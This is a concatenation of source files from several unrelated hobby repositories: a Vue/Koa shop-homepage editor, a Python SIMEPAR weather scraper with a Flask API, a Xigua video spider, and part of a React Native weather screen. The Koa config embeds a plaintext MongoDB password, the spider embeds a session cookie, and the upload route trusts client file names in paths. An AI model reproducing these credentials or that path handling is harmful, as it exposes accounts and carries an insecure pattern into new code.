url:'http://localhost:3000/api/getShopitemList',
method: 'get',
params
})
}<file_sep>/src/router/index.js
import Vue from 'vue'
import VueRouter from 'vue-router'
Vue.use(VueRouter)
const routes = [{
path: '/',
redirect: '/box',
},
{
path: '/box',
component: () => import('@/views/Box/index-container.vue'),
children: [{
path: '',
component: () => import('@/views/Box/index-wrapper.vue'),
children: [{
path: '',
redirect: '/box/block'
},
{
path: 'block',
name: 'block',
component: () => import('@/views/Box/module/block.vue'),
children: [{
path: 'dialog',
name: 'dialog',
component: () => import('@/views/Box/toolBar/dialog_coupon.vue'),
}]
},
{
path: 'picture',
component: () => import('@/views/Box/module/picture.vue'),
},
{
path: 'template',
component: () => import('@/views/Box/module/template.vue'),
}
]
}]
},
]
const router = new VueRouter({
mode: 'hash',
base: process.env.BASE_URL,
routes
})
export default router<file_sep>/src/utils/directive.js
import vue from 'vue';
import {
addStyle
} from './dom';
var previewFunction = (el, binding) => {
el.__container = document.querySelector("#previewIMG");
if (!el.__container) {
el.__container = document.createElement("div");
el.__container.id = "previewIMG";
el.__container.innerHTML = "<img />";
document.body.appendChild(el.__container);
addStyle(`
#previewIMG { position: fixed; top: 20px; min-height: 200px; pointer-events: none; z-index:100000; height: auto; width: auto;left: 20px; opacity: 0; transition: all ease-out .4s; }
#previewIMG.active{ opacity: 1; }
#previewIMG.rightPos{ left: unset; right: 20px;; }
#previewIMG img { max-height: 80vh; max-width: 50vw; box-shadow: 0px 12px 14px -9px #767676; display: block; border-radius: 5px; border: 5px solid rgb(64,158,255); border-image: linear-gradient(240deg,rgb(43, 235, 228),rgb(64,158,255)) 1 stretch; }
`, `#${el.__container.id}`);
}
el.addEventListener("mouseover", e => {
var x = e.clientX;
var w = document.body.clientWidth;
el.__container.classList[x / w < 0.5 ? 'add' : 'remove']('rightPos');
var img = document.createElement("img");
img.src = binding.value;
img.onload = () => {
var innerImg = el.__container.querySelector("img");
innerImg.src = binding.value;
innerImg.style.maxWidth = binding.modifiers.small? '40vw': binding.modifiers.medium? '45vw':'50vw'
};
el.__container.classList.add("active");
});
el.addEventListener("mouseout", e => {
el.__container.classList.remove("active");
});
}
vue.directive('preview', {
bind(el, binding) {
previewFunction(el, binding);
console.log('v-preview bind');
},
unbind(el,binding){
el.__container.classList.remove('active');
}
})<file_sep>/NODE_SERVER/public/js/preview.js
function init(){
handleData([...data],function(){
var swiper = new Swiper('.swiper-container',{
pagination: {
el: '.swiper-pagination',
type: 'fraction',
},
navigation: {
nextEl: '.swiper-button-next',
prevEl: '.swiper-button-prev',
},
});
});
}
//sdfsa
window.onload = ()=>{
init();
}
function handleData(data, callback){
var result = data.reduce((t,el) => {
el.ratio = document.body.clientWidth / el.baseWidth;
el.baseWidth = document.body.clientWidth;
el.baseHeight = el.baseHeight * el.ratio;
switch (el.type) {
case 'block': t += templateBlock(el);break;
case 'lunbo': t += templateLunbo(el);break;
case 'video': t += templateVideo(el);break;
default:break;
}
return t;
}, '')
document.querySelector('#root').innerHTML = result;
callback();
}
function templateLunbo(data){
var source = document.querySelector('#lunboTemplate').innerHTML;
var t = Handlebars.compile(source);
data.lunboList.forEach(el=>{
el.image = el.image.replace('/api/','/');
})
return t(data);
}
function templateBlock(data){
data.bgUrl.url = data.bgUrl.url.replace('/api/','/');
var source = document.querySelector('#blockTemplate').innerHTML;
var t = Handlebars.compile(source);
var ratio = data.ratio;
// data.baseHeight = ratio * data.baseHeight;
data.mapList.forEach(mel => {
var { x, y, width, height } = mel;
mel.x = (x * ratio);
mel.y = (y * ratio);
mel.width = width * ratio;
mel.height = height * ratio;
})
return t(data);
}
function templateVideo(data) {
var source = document.querySelector('#videoTemplate').innerHTML;
var t = Handlebars.compile(source);
data.videoInfo.videoImage = data.videoInfo.videoImage.replace('/api/','/')
return t(data);
}
<file_sep>/src/store/index.js
import Vue from 'vue'
import Vuex from 'vuex'
import box from './box'
import * as storage from './../utils/storage'
Vue.use(Vuex)
export default new Vuex.Store({
state: {
imgList: [ { "url": "https://img14.360buyimg.com/cms/jfs/t1/111883/20/2391/38719/5ea1b0f2Ee27cf3fe/5de52ee5d008e65d.jpg",
"type": "all", "image_type": "jpg", "width": 1920, "height": 600, "remark": "", "create_time": 1585189414550 },
{ "url": "https://img10.360buyimg.com/cms/jfs/t1/100141/24/18178/55217/5e8d4501Ed3c42e03/c0c444b912e7e531.jpg",
"type": "all", "image_type": "jpg", "width": 1920, "height": 600, "remark": "", "create_time": 1585189414831 },
{ "url": "https://img11.360buyimg.com/cms/jfs/t1/128777/36/2712/80911/5ec8ad6dE27a79bbe/e8f9aba130b7f6f8.jpg",
"type": "all", "image_type": "jpg", "width": 1920, "height": 600, "remark": "", "create_time": 1585189415098 },
{ "url": "https://img11.360buyimg.com/cms/jfs/t1/47816/39/11180/155441/5d834bbaEc00cc8a2/16b2f80f833606ed.jpg",
"type": "all", "image_type": "jpg", "width": 1920, "height": 600, "remark": "", "create_time": 1585189415322 },
{ "url": "https://img13.360buyimg.com/cms/jfs/t1/114278/20/7735/38758/5ec55169Eb0df7963/080c1c1d612727d9.jpg",
"type": "all", "image_type": "jpg", "width": 1920, "height": 600, "remark": "", "create_time": 1585189415509 },],
typeLabelList: new Map([
[
"block",
{
label: "板块",
type: "primary",
color: "#409EFF",
value: "block",
icon: 'el-icon-files'
}
],
[
"lunbo",
{
label: "轮播",
type: "success",
color: "#67c23a",
value: "lunbo",
icon: 'el-icon-picture-outline'
}
],
[
"video",
{
label: "视频",
type: "warning",
color: "#e6a23c",
value: "video",
icon: 'el-icon-video-camera'
}
],
[
"list",
{
label: "列表",
type: "danger",
color: "#409EFF",
value: "block",
icon: 'el-icon-files'
}
],
]),
curTemplateID: storage.getStorage({name: 'templateID'})
},
mutations: {
ADD_IMAGE_LIST(state, val) {
function ImageModel({
url,
type,
width,
height
}) {
return {
url: url ? url : '',
type: 'all',
image_type: type,
width: width,
height: height,
remark: '', //备注信息
create_time: Date.now()
}
}
state.imgList.push(new ImageModel(val));
},
SET_CUR_TEMPLATE_ID(state, val){
state.curTemplateID = val;
storage.setStorage({name: 'templateID', type:'session', content: val});
}
},
actions: {},
getters: {
getTypeLabelList: (state, getters) => val => {
return state.typeLabelList.get(val);
},
imgList(state) {
return state.imgList
},
allImageList(state){
return state.imgList.filter(el => el.type == 'all')
},
lunboImageList(state,getters) {
return getters.allImageList.concat(state.imgList.filter(el => el.type == 'lunbo'))
},
blockImageList(state,getters) {
return getters.allImageList.concat(state.imgList.filter(el => el.type == 'block'))
},
videoImageList(state,getters) {
return getters.allImageList.concat(state.imgList.filter(el => el.type == 'video'))
}
},
modules: {
box
}
})<file_sep>/NODE_SERVER/routes/index.js
const router = require('koa-router')()
const MongoClient = require('mongodb').MongoClient;
var {ObjectId} = require('mongodb')
var {mongoURL: url} = require('./config')
router.get('/', async (ctx, next) => {
await ctx.render('index', {
title: 'Hello Koa 2! This is API website'
})
})
router.get('/preview', async(ctx) => {
var insertedID = ctx.request.query.insertedID || '5e7b0db35750c74f10322c91';
if(insertedID.length != 24) return ;
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
console.log("Connected successfully to server");
var db = client.db('already');
db.collection('preview').findOne({_id: ObjectId(insertedID)},{}, (err,rs) =>{
if(err) rej(err)
res(rs);
})
})
}).then(r=>r).catch(e=>{
console.log(e);
})
console.log(rs);
await ctx.render('preview', {
code: 200,
msg: 'got',
data:rs
});
})
router.get('/template', async(ctx) => {
var insertedID = ctx.request.query.templateID ;
if(insertedID.length != 24) return ;
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
console.log("Connected successfully to server");
var db = client.db('already');
db.collection('template').findOne({_id: ObjectId(insertedID)},{}, (err,rs) =>{
if(err) rej(err)
res(rs);
})
})
}).then(r=>r).catch(e=>{
console.log(e);
})
console.log(rs);
await ctx.render('template', {
code: 200,
msg: 'got',
data:rs.data.box.boxList
});
})
module.exports = router
<file_sep>/src/main.js
import Vue from 'vue'
import App from './App.vue'
import router from './router'
import store from './store'
//element-ui
import ElementUI from 'element-ui';
import 'element-ui/lib/theme-chalk/index.css';
// * custom-config
import '@/assets/global.less'; // global css
import './utils/directive'; // global vue-directives
import './components/toast.js';
//draggable
import VueDraggableResizable from 'vue-draggable-resizable'
import 'vue-draggable-resizable/dist/VueDraggableResizable.css'
//swiper
import swiper from "vue-awesome-swiper";
import "swiper/dist/css/swiper.css";
//draggable-for list sortable
import draggable from "vuedraggable";
//splitPane - view split
import splitPane from 'vue-splitpane'
//qrcode - create qrcode for scanning
import QrcodeVue from 'qrcode.vue'
Vue.component('vue-draggable-resizable',VueDraggableResizable)
Vue.component('split-pane', splitPane);
Vue.component('qrcode',QrcodeVue);
Vue.component('draggable',draggable);
Vue.use(swiper);
Vue.use(ElementUI);
Vue.config.productionTip = false;
new Vue({
router,
store,
render: h => h(App)
}).$mount('#app')
<file_sep>/NODE_SERVER/routes/api_v1.js
var router = require('koa-router')({prefix: '/api'});
var fs = require('fs');
var path = require('path')
var imageSize = require('image-size')
const MongoClient = require('mongodb').MongoClient;
var {ObjectId} = require('mongodb')
var {mongoURL: url} = require('./config')
router.get('/', ctx => {
ctx.body ='fsd'
})
router.post('/action/upload', async ctx => {
try {
const file = ctx.request.files.file;
var date = new Date();
var todayDate = `${date.getFullYear()}-${date.getMonth() + 1}-${date.getDate()}`
var filename = file.size + "-" + file.name;
// 创建可读流
let filePath = path.join(__dirname, './../public/upload/', todayDate + '/' + filename);
const fileDir = path.join(__dirname, './../public/upload/', todayDate);
if (!fs.existsSync(fileDir)) {
fs.mkdirSync(fileDir);
}
const upStream = fs.createWriteStream(filePath);
const render = fs.createReadStream(file.path).pipe(upStream);
console.log(filePath);
let data = await new Promise(res=>{
upStream.on('close',function () {
let imgInfo = {
url: '/upload/' + todayDate + '/' + filename,
...imageSize(filePath)
}
res(imgInfo)
})
})
ctx.body = {
code: 200,
msg: '上传图片成功!',
data: data
}
}
catch (e) {
console.log(e);
}
});
router.post('/postPreviewData',async ctx => {
var data = ctx.request.body.data || [];
if(!Array.isArray(data)) data = JSON.parse(data)
console.log(data);
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
console.log("Connected successfully to server");
var db = client.db('already');
db.collection('preview').insertOne({data: data},(err,rs)=>{
if(err) rej(err);
res(rs);
})
});
})
ctx.body = {
code: 200,
msg: '数据保存成功',
insertedID: rs.insertedId
}
});
router.get('/getPreviewData',async ctx => {
try{
var insertedID = ctx.request.query.insertedID || '';
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
console.log("Connected successfully to server");
console.log(client);
if(err) throw new Error(err)
var db = client.db('already');
db.collection('preview').findOne({_id: ObjectId(insertedID)},{}, (err,rs) =>{
rs.data.forEach((el)=>{
el.bgUrl.url = el.bgUrl.url.replace('/api/',"http://192.168.36.119:3000/")
el.lunboList.forEach(lb => {
lb.image = lb.image.replace('/api/',"http://192.168.36.119:3000/")
});
delete el.previewURL;
switch (el.type) {
case 'block': delete el.lunboList;delete el.lunboConfig;delete el.videoInfo;break
case 'lunbo': delete el.bgUrl;delete el.mapList;
delete el.videoInfo;break
case 'video': delete el.lunboList;delete el.lunboConfig;delete el.bgUrl;delete el.mapList;break
}
return el;
})
res(rs.data);
})
});
})
ctx.body = {
code: 200,
msg: 'got',
data:rs
}
}
catch(e){
console.log(e);
ctx.body = {code:23}
}
});
router.post('/postTemplateData',async ctx => {
var data = ctx.request.body.data || {};
var title = ctx.request.body.title;
var addTime = new Date();
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
var db = client.db('already');
db.collection('template').insertOne({data,title,addTime},(err,rs)=>{
if(err) rej(err);
res(rs);
})
});
})
ctx.body = {
code: 200,
msg: '数据保存成功',
templateID: rs.insertedId
}
});
router.post('/updateTemplate',async ctx => {
var data = ctx.request.body.data || {};
var templateID = ctx.request.body.templateID;
var updateTime = new Date();
var rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
var db = client.db('already');
db.collection('template').findOneAndUpdate({
_id: ObjectId(templateID)
},{
$set:{
data,
updateTime
}
},(err,rs)=>{
if( err || !(rs.lastErrorObject.updatedExisting) ){
rej(-1)
}else{
res(rs)
}
})
})
}).then(r=>{
return {
code: 200,
newData: r.value,
msg: '更新成功'
}
}).catch(e=>{
return {
code: 110,
msg: '更新失败'
}
});
console.log(rs);
ctx.body = rs;
});
router.get('/getTemplateData',async ctx => {
try{
var insertedID = ctx.request.query.templateID || '5e7da15c03949552d010da63';
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
var db = client.db('already');
db.collection('template').findOne({_id: ObjectId(insertedID)},{}, (err,rs) =>{
res(rs);
})
});
})
ctx.body = {
code: 200,
msg: '模板数据加载成功',
data: rs.data,
templateID: rs._id,
}
}
catch(e){
ctx.body = {code:233, msg: '找不到模板'}
}
});
router.get('/getTemplateList',async ctx => {
try{
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
var db = client.db('already');
db.collection('template').find({},{
projection:{
_id:1,
title:1,
addTime:1
},
sort:{
addTime: -1
}
}).toArray((err,doc)=>{
console.log(err,doc);
if(err) rej([])
res(doc);
})
});
})
ctx.body = {
code: 200,
msg: 'gotten',
data: rs,
}
}
catch(e){
ctx.body = {code:23}
}
});
router.post('/removeTemplateByID', async ctx => {
try{
var templateID = ctx.request.query.templateID;
let rs = await new Promise((res,rej) => {
MongoClient.connect(url, function(err, client) {
var db = client.db('already');
db.collection('template').deleteOne({
_id: ObjectId(templateID)
},{}, (err,rs) => {
if(err) rej(-1);
res(1)
})
});
})
ctx.body = {
code: 200,
msg: 'ok'
}
}
catch(e){
ctx.body = {code:23}
}
});
router.get('/getShopitemList', async ctx => {
var {curPage = 1, limit = 10, brand = '', skuId, queryString} = ctx.request.query;
var filter = {};
console.log(skuId);
if( skuId != undefined){
limit = 1000;
filter.skuId = {$in:skuId.split(',')}
console.log(filter);
}else if(queryString != ''){
limit = 1000;
filter.skuId = new RegExp(queryString);
}else {
filter.brand = new RegExp(brand);
if(limit == -1) limit = 1000;
}
var s = await require('./mongo').select({
collection: 'shopitem',
filter,
options:{
limit: limit / 1,
skip: ((curPage - 1) * limit) / 1,
projection: ['_id', 'skuId','name','img','price']
}
});
s.total = await require('./mongo').db().then(async r=>{
return await new Promise((res,rej)=>{
r.collection('shopitem').countDocuments(filter,{}).then(r=>{
res(r);
}).catch(e=>{
rej(e)
})
})
}).catch(e=>e);
ctx.body = Object.assign(s, {curPage,limit,brand,_: new Date().toLocaleString()});
})
module.exports = router;
<file_sep>/src/components/toast.js
import Vue from 'vue';
import {
Message
} from 'element-ui'
import _ from '@/utils/other.js'
import './toast.less';
var myToast = function (msg, type = 'info') {
var obj = {
offset: 55,
center: true,
customClass: 'julone_toast_class',
type: type == 'loading' ? 'info' : type,
iconClass: type == 'loading' ? 'el-icon-loading' : null,
duration: 2000,
// showClose:true,
offset: document.body.clientHeight / 3 * 2,
}
var temp = _.isObject(msg) ? msg : ({
message: msg
})
myToast.closeAll();
var inst = Message(Object.assign(obj, temp))
clearAni(inst.$el);
return inst
}
function clearAni($el){
$el.style.transition = `opacity .3s,top .4s,transform .4s`;
setTimeout(() => {
$el.style.animation = `none`;
}, 500)
}
var type = ['success', 'info', 'warning', 'error', 'loading', 'plain'];
for (let t of type) {
myToast[t] = function (msg) {
let temp = _.isObject(msg) ? msg : ({ message: msg })
return myToast(temp, t)
}
}
myToast.close = Message.close;
myToast.closeAll = Message.closeAll;
Vue.prototype.$toast = myToast
export default myToast<file_sep>/NODE_SERVER/routes/mongo.js
const MongoClient = require('mongodb').MongoClient;
var {ObjectId} = require('mongodb');
// const url = 'mongodb://127.0.0.1:27017/?gssapiServiceName=mongodb';
var {mongoURL: url} = require('./config')
module.exports = {
async db(){
return await new Promise((res,rej) => {
MongoClient.connect(url, { useNewUrlParser: true, useUnifiedTopology: true }, function(err, client) {
var db = client.db('already');
res(db);
});
})
},
async select({collection, filter={}, options = {}}){
if(filter._id) filter._id = ObjectId(filter._id);
var result = await new Promise(async (resolve,reject) => {
var db = await this.db();
db.collection(collection).find(filter,options).toArray((err,docs)=>{
return err? reject(err): resolve(docs);
})
}).then(docs=>({
code: 200, data: docs
})).catch(e=>({
msg: e.errmsg,
code: e.code,
data: e
}));
return result;
},
}
<file_sep>/NODE_SERVER/routes/config.js
module.exports = {
mongoURL: 'mongodb+srv://julone:qwer183371456@<EMAIL>.<EMAIL>/qdian?retryWrites=true&w=majority'
}<file_sep>/src/store/boxMap.js
export default {
state:{
mapActiveID: -1,
map_item_ID: 1,
},
mutations:{
ADD_BOX_MAP(state,{ x,y,width,height }){
if(width < 20 || height < 20) return;
var item = state.boxList.find(el => el.id === state.boxActiveID).mapList;
state.mapActiveID = state.map_item_ID;
item.push({
id: state.map_item_ID++,
x,y,width,height,
action: {
type: null,
data: {}
}
});
},
REMOVE_BOX_MAP(state, {boxID,mapID}){
var mapList = state.boxList.find(el => el.id === boxID).mapList;
var mapIndex = mapList.indexOf(mapList.find(el=>el.id == mapID));
if(mapIndex != -1){
mapList.splice(mapIndex,1);
}
state.mapActiveID = -1;
},
DRAG_BOX_MAP(state, {boxID,mapID,x,y}){
var mapList = state.boxList.find(el => el.id === boxID).mapList;
var mapItem = mapList.find(el => el.id == mapID);
mapItem = Object.assign(mapItem,{x,y});
},
RESIZE_BOX_MAP(state,{ x, y, width, height, mapID,boxID}){
var mapList = state.boxList.find(el => el.id === boxID).mapList;
var mapItem = mapList.find(el => el.id == mapID);
mapItem = Object.assign(mapItem,{x,y,width,height});
},
SET_MAP_ACTIVE_ID(state, val){
state.mapActiveID = val
},
SET_MAP_ACTION_ITEM_ACTION_TYPE(state,{boxID,val}){
var mapList = state.boxList.find(el => el.id === state.boxActiveID).mapList;
var mapItem = mapList.find(el=>el.id == state.mapActiveID);
mapItem.action.type = val;
},
SET_MAP_ACTION_ITEM_ACTION_DATA(state,val){
var mapList = state.boxList.find(el => el.id === state.boxActiveID).mapList;
var mapItem = mapList.find(el=>el.id == state.mapActiveID);
mapItem.action.data = val;
}
},
actions:{
},
getters:{
activeMapItem:(state,getters)=>{
if(getters.activeMapList.length && state.mapActiveID > 0){
return getters.activeMapList.find(el=>el.id == state.mapActiveID)
}else {
return null;
}
},
mapActiveID(state,getters){
return state.mapActiveID
},
activeMapItemActionType(state,getters){
if(getters.activeMapItem){
return getters.activeMapItem.action.type
}else {
return ""
}
},
activeMapList:(state,getters) =>{
if(getters.boxActiveItem){
return getters.boxActiveItem.mapList
}else{
return [];
}
},
}
}<file_sep>/src/utils/other.js
import { format } from "element-ui/lib/utils/date";
export const timeFormat = (val, param = 'yyyy/M/d HH:mm:ss') =>{
return format(new Date(val),param)
};
export function isObject(target){
return Object.prototype.toString.call(target) === '[object Object]'
}
export default {
isObject
}
<file_sep>/README.md
#商店个性化首页定制
--类似于淘宝的店家定制首页
<file_sep>/src/backup/data2.js
export default [{
css: {
backgroundImage: `https://img10.360buyimg.com/imgzone/jfs/t1/61154/6/9626/225675/5d7466c3Ee42061f6/4938be3b7e869df5.jpg`,
width: '518px',
height: '206px'
},
className: 'item',
tag: "div",
children: [{
tag: 'a',
css: 'position:absolute;left:0;top:0;width:30%;height:100px',
url: '/a',
events: {
click: {
funName: 'info',
data: {
params: {
id: 23432423,
}
}
}
},
},
{
tag: 'a',
css: 'position:absolute;right:0;top:0;width:50%;height:100%',
url: '/b?id=2343242304893208',
children: [{
tag: 'a',
css: 'position:absolute;right:0;top:0;width:20%;height:100%',
url: '/b',
children: [{
tag: 'a',
css: 'position:absolute;right:0;top:0;width:10%;height:100%',
url: '/b',
}]
}]
},
]
}, {
css: {
width: '518px',
height: '473px',
backgroundImage: `https://img10.360buyimg.com/imgzone/jfs/t1/103831/10/6483/428573/5df349faE2f2d4147/a45aecf79cb796e2.jpg`,
},
className: 'item',
tag: 'div',
children: [{
tag: 'a',
css: 'position:absolute;left:100px;top:60px;width:75px;height:120px',
url: '/aa',
events: {
click: {
funName: 'complexJump',
data: {
url: 'sadf',
name: 'asdf',
params: {
q: '243'
},
query: {
id: 234
}
}
}
}
},
{
tag: 'a',
css: 'position:absolute;left:175x;top:60px;width:75px;height:120px',
url: '/bb',
},
]
}
]
|
43621bff22b45a526b138b99aa55c02647d4899a
|
[
"JavaScript",
"Markdown"
] | 16
|
JavaScript
|
Julone/QianDianQM
|
0df22ff5b70ef20e01b2fd4a879894b520acf9fe
|
7d26175de614be292e40aa22c2a132817b840ab2
|
refs/heads/main
|
<file_sep>import re
import json
import js2xml
import requests
import datetime
from slugify import slugify
from itertools import repeat
from bs4 import BeautifulSoup
class SimeparAPI:
def __init__(self, municipio):
if not municipio:
raise Exception(
"É preciso informar um código IBGE de município do Paraná")
self.municipio = str(municipio)
self.url = "http://www.simepar.br/prognozweb/simepar/forecast_by_counties/"
self.buscaPagina()
self.processaPagina()
def buscaPagina(self):
pagina = requests.get(self.url + self.municipio)
self.pagina = pagina.text
def processaPagina(self):
soup = BeautifulSoup(self.pagina, "html5lib")
dados_javascript = soup.find_all('script', {'type': 'text/javascript'})
dados_para_buscar = dados_javascript[-1].text
expressao_buscar = re.compile(r"var info = (.*);")
retorno_buscar = json.loads(
expressao_buscar.search(dados_para_buscar).group(1))
dados_do_grafico = dados_javascript[-6].text
parsed = js2xml.parse(dados_do_grafico)
data = [d.xpath(".//array/number/@value")
for d in parsed.xpath("//property[@name='data']")]
categories = parsed.xpath(
"//property[@name='categories']//string/text()")
output = list(zip(repeat(categories), data))
previsao_saida = {}
for indice, data_previsao in enumerate(output[0][0][:15]):
previsao_saida[data_previsao] = {
'maxima': output[0][1][indice], 'minimo': output[1][1][indice]}
dados_horaria_saida = {}
dados_horaria_saida['dados'] = retorno_buscar
dados_horaria_saida['previsao_hora'] = {}
dados_horaria_saida['previsao'] = previsao_saida
for dados_container in soup.find_all('div', {'class': 'wrapper'}):
dados_data_extracao = dados_container.find(
'div', {'class': 'currentDay'})
temperatura = dados_container.find(
'span', {'class': 'currentTemp'})
data_extracao = [parte.strip()
for parte in dados_data_extracao.text.split('-')]
temperatura_extracao = temperatura.text.strip()
dados_extracao = dados_container.find(
'div', {'id': 'collapseAcci'})
dados_gerais = [' '.join(info.text.split())
for info in dados_extracao.find_all('span')]
dados_previsao_horaria_extracao = dados_container.find(
'div', {'id': 'accordion-hourly-wrapper'})
dados_horaria = dados_previsao_horaria_extracao.find_all(
'a', {'class': 'list_toggle'})
for info in dados_horaria:
dados_adicionais = {}
hora = info.find('div', {'class': 'ah-time'}).text.strip()
dados_temperatura = info.find(
'div', {'class': 'ah-temp'})
temperatura = dados_temperatura.text.strip()
tempo = dados_temperatura.find(
'i')['title'].strip()
precipitacao = info.find(
'div', {'class': 'ah-prec'}).text.strip()
vento = info.find('div', {'class': 'ah-wind'}).text.strip()
dados_adicionais['temperatura'] = temperatura
dados_adicionais['tempo'] = tempo
dados_adicionais['chuva'] = precipitacao
dados_adicionais['vento'] = vento
dados_horaria_saida['previsao_hora'][hora] = dados_adicionais
dados_gerais_horaria = dados_previsao_horaria_extracao.find_all(
'div', {'class': ['collapse', 'ah-body']})
dados_gerais_horaria_saida = {}
for info in dados_gerais_horaria:
dados = [' '.join(saida.text.split())
for saida in info.find_all('span')]
chunks = [dados[i:i+2] for i in range(0, len(dados), 2)]
for (nome, informacao) in chunks:
dados_gerais_horaria_saida[slugify(nome)] = informacao
dados_horaria_saida['previsao_hora'][hora].update(
dados_gerais_horaria_saida)
self.dados_horario = dados_horaria_saida
<file_sep># Projeto de final de semana para obter dados do SIMEPAR automaticamente
<file_sep>import flask
from flask import request, jsonify
from simeparAPI import SimeparAPI
app = flask.Flask(__name__)
app.config["DEBUG"] = True
@app.route('/', methods=['GET'])
def home():
return '''<h1>SIMEPAR API</h1>
<p>Uma API protótipo para pesquisa de dados metereológicos da SIMEPAR</p>'''
@app.errorhandler(404)
def page_not_found(e):
return "<h1>404</h1><p>O recurso não foi encontrado.</p>", 404
@app.route('/api/v1/resources/forecast', methods=['GET'])
def api_filter():
query_parameters = request.args
id = query_parameters.get('id')
dados = SimeparAPI(id)
return jsonify(dados.dados_horario)
app.run()
|
f5bf6a7eb9cbc1b675e19a210763fb15ab4f1e55
|
[
"Markdown",
"Python"
] | 3
|
Python
|
aniltonjunior/simepar-api
|
e8b15c50d0bd26dbf8cb9356cfe76cf756337353
|
3fbe3bff54c2e71ffe3d03a8cbb7c217e16f9814
|
refs/heads/master
|
<file_sep>#include <stdio.h>
#include <conio.h>
int main(int argc, char* argv[])
{
FILE *in;
fopen_s(&in,"pict.jpg","rb");//открываем указанный в аргументе файл для чтения в бинарном режиме
if (in==NULL)
{
printf("Can not open the file");
_getch();
return 1; //выход
}
fclose(in);
_getch();
return 0;
}
|
3b1204a1f310c71a5758c61db30ef45e79883046
|
[
"C"
] | 1
|
C
|
emeraldtune/sepia_filter
|
c25ce3c04e2ddbf319897b5e38e2fc2b2a9e7e58
|
ebb33aec785ecb353379f65a558783ff5de362ea
|
refs/heads/master
|
<file_sep># -*- coding:utf-8 -*-
import requests
import json
import time
"""
目标:尝试爬取西瓜视频
"""
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36",
"cookie": "td_cookie=2895957341; wafid=aa79e1cd-16dc-421b-b94d-b20a5ebfe91c; wafid.sig=D1-hFWUnCB8JJJTV-R1e_Cdx9uI; ttwid=6828065332000769548; ttwid.sig=ec3MPPdMOxx89J6pbmB2OuU52MA; xiguavideopcwebid=6828065332000769548; xiguavideopcwebid.sig=yjuAl7rEBOyfAgDFXiIB2YRIClg; SLARDAR_WEB_ID=6e7b528c-1744-4481-8954-69b88fa6dc9a; _ga=GA1.2.1690086969.1589782861; _gid=GA1.2.1558373712.1589782861; ixigua-a-s=1; s_v_web_id=verify_kac6yx8v_ow0JbieE_IIBj_41xD_8WKa_oNG1TTArwzeg; _gat_gtag_UA_138710293_1=1"}
url = "https://www.ixigua.com/api/feedv2/feedById?_signature=gr1SjgAgEA1wkmDJc74FlIK9UpAANyM&channelId=94349543909&count=9&maxTime=0&request_from=701"
def get_info():
try:
# 获取毫秒级的时间戳
stamp = int(time.time())
params = {
"_signature": "iAhAtAAgEA56J3Lz0Xeki4gIQKAANbX",
"channelId": "94349543909",
"count": 9,
"maxTime": stamp,
"request_from": 701
}
response = requests.get(url=url, timeout=10)
if response.status_code == 200:
print(response.json())
except Exception as e:
print(e)
if __name__ == '__main__':
get_info()
|
a2b4dd5d34fa89f02ccaf9585d0b4b9dfe96e2c5
|
[
"Python"
] | 1
|
Python
|
pengjinfu/Net-Spider
|
570c2c79a2c160260bd3b6a7dd884f6885f91e31
|
720691393606493a02032bee6bcd66515fbb1ebc
|
refs/heads/master
|
<file_sep>import React from "react";
import { View, Text, StyleSheet, StatusBar } from "react-native";
import PropTypes from "prop-types";
import { MaterialCommunityIcons } from "@expo/vector-icons";
import { LinearGradient } from "expo-linear-gradient";
const weatherOptions = {
Haze: {
iconname: "weather-fog",
gradient: ["#ffe259", "#ffa751"],
title: "Haze",
subtitle: "Watch out",
},
Thunderstorm: {
iconname: "weather-lightning",
gradient: ["#544a7d", "#ffd452"],
title: "Thunderstorm",
subtitle: "Don't go outside",
},
Drizzle: {
iconname: "weather-rainy",
gradient: ["#005AA7", "#FFFDE4"],
title: "Drizzle",
subtitle: "Humidity High",
},
Rain: {
iconname: "weather-pouring",
gradient: ["#00F260", "#0575E6"],
title: "Rain",
subtitle: "Eat buchimgea",
},
Snow: {
iconname: "weather-snowy",
gradient: ["#74ebd5", "#ACB6E5"],
title: "Snow",
subtitle: "NO!!!! I can't drive",
},
Atmosphere: {
iconname: "weather-cloudy-arrow-right",
gradient: ["#6D6027", "#D3CBB8"],
title: "Atmosphere",
subtitle: "What is Atmosphere?",
},
Clear: {
iconname: "weather-sunny",
gradient: ["#C9D6FF", "#E2E2E2"],
title: "Clear",
subtitle: "How nice weather~!",
},
Clouds: {
iconname: "weather-cloudy",
gradient: ["#ffd89b", "#19547b"],
title: "Clouds",
subtitle: "So so",
},
Haze: {
iconname: "weather-fog",
gradient: ["#bdc3c7", "#2c3e50"],
title: "Haze",
subtitle: "Listen Haze's music",
},
Mist: {
iconname: "weather-tornado",
gradient: ["#808080", "#3fada8"],
title: "Mist",
subtitle: "Chock chock",
},
Dust: {
iconname: "weather-hazy",
gradient: ["2c3e50", "fd746c"],
title: "Dust",
subtitle: "Mask on",
},
};
export default function Weather({ temp, condition }) {
return (
<LinearGradient
colors={weatherOptions[condition].gradient}
style={styles.container}
>
<StatusBar barStyle="light-content" />
<View style={styles.halfContainer}>
<MaterialCommunityIcons
size={96}
name={weatherOptions[condition].iconname}
color="white"
/>
<Text style={styles.temp}>{temp}º</Text>
</View>
<View style={{ ...styles.halfContainer, ...styles.titleContainer }}>
<View>
<Text style={styles.title}>{weatherOptions[condition].title}</Text>
<Text style={styles.subtitle}>
{weatherOptions[condition].subtitle}
</Text>
</View>
</View>
</LinearGradient>
);
}
Weather.propTypes = {
temp: PropTypes.number.isRequired,
condition: PropTypes.oneOf([
"Thunderstorm",
"Drizzle",
"Rain",
"Snow",
"Atmosphere",
"Clear",
"Clouds",
"Haze",
"Mist",
"Dust",
]).isRequired,
};
const styles = StyleSheet.create({
container: {
flex: 1,
justifyContent: "center",
alignItems: "center",
},
temp: {
fontSize: 42,
color: "white",
},
halfContainer: {
flex: 1,
justifyContent: "center",
alignItems: "center",
},
titleContainer: { paddingHorizontal: 20 },
title: {
color: "white",
fontSize: 54,
marginBottom: 10,
fontWeight: "300",
},
